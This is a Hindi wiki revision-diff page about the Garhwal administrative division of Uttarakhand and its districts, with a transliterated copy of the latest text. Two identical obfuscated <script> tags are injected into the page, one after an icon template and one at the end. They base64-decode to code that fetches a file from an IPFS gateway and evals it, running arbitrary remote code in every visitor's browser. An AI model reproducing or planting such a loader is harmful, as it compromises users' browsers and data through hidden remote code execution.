Difference between revisions of "गढ़वाल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
[उत्तराखण्ड]] की राज्य में प्रशासनिक सुविधा के उद्देश्य से दो मुख्य संभाग (मंडल) बनाऐ गये हैं [[गढ़वाल]] तथा [[कुमाऊँ]] ।[[कुमाऊँ]] संभाग (मंडल) में [[नैनीताल]] [[पिथौरागढ़]], [[अल्मोड़ा ]], [[बागेश्वर]], [[ चम्पावत]] तथा [[उधमसिंह नगर]] जनपद सम्मिलित हैं जबकि गढवाल संभाग में [[पौडी गढ़वाल]] [[टिहरी गढ़वाल]] [[उत्तरकाशी]] [[देहरादून]] [[चमोली]], [[रुद्रप्रयाग]] तथा [[हरिद्वार]] जनपद शामिल है।
+
'''गढ़वाल''' [[उत्तराखण्ड]] की राज्य में प्रशासनिक सुविधा के उद्देश्य से बनाऐ गये दो मुख्य संभाग (मंडल) में से एक है। दूसरा मण्डल हैं [[कुमाऊँ]]। कुमाऊँ संभाग (मंडल) में [[नैनीताल]], [[पिथौरागढ़]], [[अल्मोड़ा ]], [[बागेश्वर]], [[ चम्पावत]] तथा [[उधमसिंह नगर]] जनपद सम्मिलित हैं जबकि गढवाल संभाग में [[पौडी गढ़वाल]], [[टिहरी गढ़वाल]], [[उत्तरकाशी]], [[देहरादून]], [[चमोली]], [[रुद्रप्रयाग]] तथा [[हरिद्वार]] जनपद शामिल है।  
 
 
 
 
गढ़वाल, [[भारत]] की आज़ादी से पूर्व एक नगर था जो अब [[उत्तराखण्ड]] राज्य में [[टिहरी गढ़वाल]]  के नाम से जाना जाता है।  
 
  
 +
* गढ़वाल, [[भारत]] की आज़ादी से पूर्व एक नगर था जो अब [[उत्तराखण्ड]] राज्य में [[टिहरी गढ़वाल]] के नाम से जाना जाता है।
 
{{Point}} विस्तृत जानकारी के लिए देखें:- [[टिहरी गढ़वाल]]
 
{{Point}} विस्तृत जानकारी के लिए देखें:- [[टिहरी गढ़वाल]]
  
  
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
+
{{उत्तराखंड के नगर}}
[[Category:भारत के नगर]]
+
[[Category:भारत के नगर]]
 
[[Category:उत्तराखंड के नगर]]
 
[[Category:उत्तराखंड के नगर]]
 
[[Category:उत्तराखंड]]
 
[[Category:उत्तराखंड]]
  
 
__INDEX__
 
__INDEX__

Latest revision as of 07:14, 20 September 2012

gadhaval uttarakhand ki rajy mean prashasanik suvidha ke uddeshy se banaai gaye do mukhy sanbhag (mandal) mean se ek hai. doosara mandal haian kumaooan. kumaooan sanbhag (mandal) mean nainital, pithauragadh, almo da , bageshvar, champavat tatha udhamasianh nagar janapad sammilit haian jabaki gadhaval sanbhag mean paudi gadhaval, tihari gadhaval, uttarakashi, deharadoon, chamoli, rudraprayag tatha haridvar janapad shamil hai.

{{#icon: Redirect-01.gif|dhyan dean}}<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> vistrit janakari ke lie dekhean:- tihari gadhaval


tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>